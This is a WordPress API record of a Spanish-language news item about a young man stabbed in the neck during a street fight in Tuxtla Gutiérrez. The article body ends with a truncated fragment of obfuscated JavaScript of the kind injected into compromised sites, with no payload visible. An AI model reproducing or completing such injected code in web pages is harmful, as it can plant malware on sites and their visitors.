{"id":9671,"date":"2023-04-21T03:42:21","date_gmt":"2023-04-21T03:42:21","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=9671"},"modified":"2023-04-21T03:42:22","modified_gmt":"2023-04-21T03:42:22","slug":"navajean-a-joven-en-rina-ocurrida-en-la-calzada-al-sumidero","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=9671","title":{"rendered":"Navajean a joven en ri\u00f1a ocurrida en la Calzada al Sumidero"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"405\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/FB_IMG_1682048482102.jpg\" alt=\"\" class=\"wp-image-9672\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/FB_IMG_1682048482102.jpg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/FB_IMG_1682048482102-300x169.jpg 300w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano, 20 de abril del 2023. Tuxtla Guti\u00e9rrez.- Un joven de 25 a\u00f1os de edad fue herido de un navajazo en el cuello, luego de participar en una ri\u00f1a este jueves por la noche en la Calzada al Sumidero de Tuxtla Guti\u00e9rrez.<\/p>\n\n\n\n<p>Los reportes oficiales informaron que, todo ocurri\u00f3 a la altura de la 17 Norte, cuando por motivos desconocidos un grupo de sujetos comenz\u00f3 a golpearse.<\/p>\n\n\n\n<p>Durante la ri\u00f1a, uno de los participantes sac\u00f3 una navaja y le asest\u00f3 un golpe a su contrincante en la garganta y escap\u00f3 corriendo.<\/p>\n\n\n\n<p>Al lugar arribaron param\u00e9dicos de la Cruz Roja para atender al herido que present\u00f3 sangrado abundante pero no quiso ser trasladado a un nosocomio.<\/p>\n\n\n\n<p>Elementos de la polic\u00eda tomaron datos de lo acontecido y aconsejaron a la v\u00edctima Interponer la denuncia correspondiente.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudadano, 20 de abril del 2023. Tuxtla Guti\u00e9rrez.- Un joven de 25 a\u00f1os de edad fue herido de un navajazo en el cuello, luego de participar en una ri\u00f1a este jueves por la noche en la Calzada al Sumidero de Tuxtla Guti\u00e9rrez. Los reportes oficiales informaron que, todo ocurri\u00f3 a la altura &hellip;<\/p>\n","protected":false},"author":2,"featured_media":9672,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-9671","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9671","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=9671"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9671\/revisions"}],"predecessor-version":[{"id":9673,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9671\/revisions\/9673"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/9672"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=9671"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=9671"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=9671"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}